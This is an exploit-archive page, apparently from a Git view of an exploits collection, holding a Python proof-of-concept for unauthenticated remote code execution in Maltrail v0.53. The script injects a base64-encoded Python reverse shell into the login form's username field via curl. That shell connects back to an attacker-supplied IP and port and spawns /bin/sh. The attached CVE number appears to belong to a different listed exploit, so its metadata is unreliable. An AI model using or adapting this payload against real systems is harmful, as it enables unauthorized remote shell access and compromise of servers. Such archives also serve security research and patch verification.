f55092b332
6 changes to exploits/shellcodes/ghdb TP-Link Archer AX21 - Unauthenticated Command Injection systemd 246 - Local Privilege Escalation Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) Request-Baskets v1.2.1 - Server-side request forgery (SSRF) OutSystems Service Studio 11.53.30 - DLL Hijacking
35 lines
No EOL
1.1 KiB
Python
Executable file
35 lines
No EOL
1.1 KiB
Python
Executable file
# Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)
|
|
# Exploit Author: Iyaad Luqman K (init_6)
|
|
# Application: Maltrail v0.53
|
|
# Tested on: Ubuntu 22.04
|
|
# CVE: CVE-2023-27163
|
|
|
|
|
|
# PoC
|
|
import sys;
|
|
import os;
|
|
import base64;
|
|
|
|
def main():
|
|
listening_IP = None
|
|
listening_PORT = None
|
|
target_URL = None
|
|
|
|
if len(sys.argv) != 4:
|
|
print("Error. Needs listening IP, PORT and target URL.")
|
|
return(-1)
|
|
|
|
listening_IP = sys.argv[1]
|
|
listening_PORT = sys.argv[2]
|
|
target_URL = sys.argv[3] + "/login"
|
|
print("Running exploit on " + str(target_URL))
|
|
curl_cmd(listening_IP, listening_PORT, target_URL)
|
|
|
|
def curl_cmd(my_ip, my_port, target_url):
|
|
payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
|
|
encoded_payload = base64.b64encode(payload.encode()).decode() # encode the payload in Base64
|
|
command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
|
|
os.system(command)
|
|
|
|
if __name__ == "__main__":
|
|
main() |